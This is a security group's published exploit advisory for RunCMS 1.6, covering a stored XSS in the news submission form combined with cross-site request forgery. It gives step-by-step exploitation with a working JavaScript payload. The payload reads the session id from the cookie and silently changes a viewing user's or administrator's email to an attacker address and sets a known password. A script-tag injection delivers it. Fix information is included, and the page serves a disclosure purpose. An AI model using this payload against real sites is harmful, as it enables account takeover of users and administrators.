Services Vulnerabilities Exploits Publications News Blog About DSecRG


[4] RunCMS 1.6 Stored XSS Injection and XSRF Exploit Change Password



#/********************************************************************/
#/* RUNCMS 1.6 Stored XSS Injection and XSRF Exploit Change Password */
#/********************************************************************/
#/*********** Exsploit get user id from cookie and then ***********/
#/*********** change user password and mail like you need ***********/
#/********************************************************************/
#/********************************************************************/
#/*********** tested on RUNCMS english version 1.6 ***********/
#/********************************************************************/
#/*********** Note: for educational purpose only ***********/
#/********************************************************************/
#/* Date of Public EXPLOIT: December 27, 2007 */
#/* Written by: Stas "CTac" Svistunovich */
#/* from [Digital Security Research Group] */
#/* research [at] dsec [dot] ru */
#/* */
#/* Original Advisory: http://www.securityfocus.com/archive/1/485512 */
#/********************************************************************/
#
#
# Details
#*********************************************************************
#
# 1. Stored XSS vulnerability found in script modules/news/submit.php
# in post parameter name "subject"
#
# Example:
#
# POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0
#
#
# subject=<script>alert("DSecRG XSS")</script>
#
#
# Parameter "subject" limited by 60 symbols
#
#
# 2. RUNCMS is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to change web
# administration password.
#
#
#
# Fix Information
#*********************************************************************
#
# RunCMS was altered to fix this flaw on Dec 15, 2007. Updated
# version (1.6.1) can be downloaded here:
#
# http://www.runcms.org/modules/mydownloads/visit.php?lid=131
#
#
#
# About
#*********************************************************************
#
# Digital Security is leading IT security company in Russia,
# providing information security consulting, audit and penetration
# testing services, risk analysis and ISMS-related services and
# certification for ISO/IEC 27001:2005 and PCI DSS standards.
# Digital Security Research Group focuses on web application and
# database security problems with vulnerability reports,
# advisories and whitepapers posted regularly on our website.
#
#
# Contact: research [at] dsec [dot] ru
# http://www.dsec.ru (in Russian)
#
#############################################################

To exploit this vulnerability attacker must:


1. Register on site.


2. Because news subject can`t be longer then 60 symbols, attacker need
upload Javascript to server using submit form.

http://[server]/[installdir]/modules/mydownloads/submit.php

For example attacker can upload file named test.zip (file name
with extension must be less then 9 symbols) contaned code:

var objHTTP = new ActiveXObject('MSXML2.XMLHTTP');
var id = document.cookie.substr(document.cookie.search("rc_sess") + 31);
objHTTP.open('POST',"http://[server]/[installdir]/edituser.php",false);
objHTTP.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
objHTTP.send("email=pwned%40attacker.com&upass=12345&vpass=12345&usecookie=0&uid=" + id + "&op=saveuser");


3. By default file will be uploaded to
http://[server]/[installdir]/modules/mydownloads/cache/files/test.zip


4. Now attacker need submit news with subject = <script src="../mydownloads/cache/files/test.zip">
on page http://[server]/[installdir]/modules/news/submit.php


5. When legal user or admin open news page his password and mail will be
changed automatically to attacker's

Exploits RSS RSS
03.05.2010
[17] ProSSHD v 1.2. Remote bind shell exploit (w/ASLR and DEP bypass using ROP)

05.03.2010
[16] SAP GUI 7.10 WebViewer3D ActiveX - JIT-Spray Exploit

05.03.2010
[15] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - JIT-Spray Exploit

15.02.2010
[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass

15.02.2010
[13] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF

18.02.2009
[12] Oracle Database SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger (metasploit module)

Exploits list


© 2002—2014, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search